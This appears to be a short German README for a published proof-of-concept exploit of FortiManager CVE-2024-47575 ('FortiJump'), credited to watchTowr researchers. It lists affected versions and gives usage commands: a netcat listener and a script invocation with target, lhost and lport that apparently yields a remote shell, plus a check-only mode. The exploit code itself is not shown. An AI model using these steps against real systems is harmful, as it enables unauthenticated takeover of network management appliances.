Fortijump Exploit CVE 2024 47575
1.0.0
Fortinet FortiManager Nicht authentifizierte Remote-Codeausführung, auch bekannt als FortiJump CVE-2024-47575
Technische Details finden Sie in unserem Blogbeitrag
Richten Sie zunächst Ihre NCAT-Sitzung ein:
nc -lvvnp 80
Führen Sie dann unseren Erkennungsartefaktgenerator aus:
python3 CVE-2024-47575.py --target 192.168.1.110 --lhost 192.168.1.53 --lport 80 --action exploit
Um die Schwachstelle allein zu prüfen, verwenden Sie die folgenden Optionen:
python3 CVE-2024-47575.py --target 192.168.1.110 --action check
FortiManager 7.6.0
FortiManager 7.4.0 through 7.4.4
FortiManager 7.2.0 through 7.2.7
FortiManager 7.0.0 through 7.0.12
FortiManager 6.4.0 through 6.4.14
FortiManager 6.2.0 through 6.2.12
FortiManager Cloud 7.4.1 through 7.4.4
FortiManager Cloud 7.2.1 through 7.2.7
FortiManager Cloud 7.0.1 through 7.0.12
FortiManager Cloud 6.4
Dieser Exploit wurde von Sina Kheirkhah (@SinSinology) von watchTowr (@watchtowrcyber) geschrieben.
Für die neuesten Sicherheitsforschungen folgen Sie dem watchTowr Labs-Team